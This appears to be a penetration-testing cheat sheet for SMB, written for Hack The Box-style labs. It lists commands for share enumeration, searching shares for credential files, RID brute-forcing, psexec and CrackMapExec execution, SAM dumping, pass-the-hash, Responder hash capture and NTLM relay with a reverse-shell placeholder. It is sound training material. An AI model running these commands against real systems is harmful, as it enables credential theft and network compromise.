We can press [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\192.168.220.129\Finance\
⚠️ **Note:** When executing commands with CrackMapExec, if `--exec-method` is not specified, CrackMapExec will try the atexec method first; if that fails, try specifying `--exec-method smbexec`.
#List the contents of the shared folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\
#Search for a specific word in the filename.
C:\htb>dir n:\*cred* /s /b
C:\htb>dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name '*cred*'
#Search for a specific word within the content of the files.
c:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred
#Download Files
smb: \> get file.txt
#Download recursive mode
smb: \Path\to\folder\> prompt off
smb: \Path\to\folder\> recurse true
smb: \Path\to\folder\> mget <folder>
#Execute local commands without interrupting the connection
smb: \> !<command>
# See who, from which host, and which share the client is connected.
smb: \> smbstatus
#------------Windows------------
#Mount shared folder
C:\htb> net use n: \\192.168.220.129\Finance (append `/user:plaintext Password123` to authenticate with explicit credentials)
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"
#Mount SMB with creds
PS C:\htb> $username = 'intrusionz3r0'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
#------------Linux------------
#sudo apt install cifs-utils.
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
**CredentialFile** (restrict it to the owner, e.g. `chmod 600`, since it stores the password in plaintext):
username=plaintext
password=Password123
domain=.
#-----------------------------
#Enumeration using SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes
intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon"
# Auth by kerberos
#export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k
#Nmap Scan
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445
#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128
#Enumeration using SMBmap
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
#Enumeration using CrackMapExec (when targeting a non-domain-joined computer use: --local-auth)
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p ''
#Enumeration using enum4linux
Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C
#Execute commands
#Note: If --exec-method is not specified, CrackMapExec will try the atexec method first; if that fails, try specifying --exec-method smbexec.
Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
#Enumerate logged-on users across a subnet
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
#Enumerate the logged on users through the network
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
#Extract SAM database
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
#Pass the hash
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
#Capture users' NetNTLM v1/v2 hashes.
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33
Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
#If we cannot crack the hash, we can potentially relay the captured NTLM authentication to another machine using impacket-ntlmrelayx.
#First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '<powershellreverseshellbase64>'
Bruteforce
#Bruteforce
(Metasploit) use auxiliary/scanner/smb/smb_login
SMB Enumeration using RPCclient.
Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128
#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128
Query
Description
srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.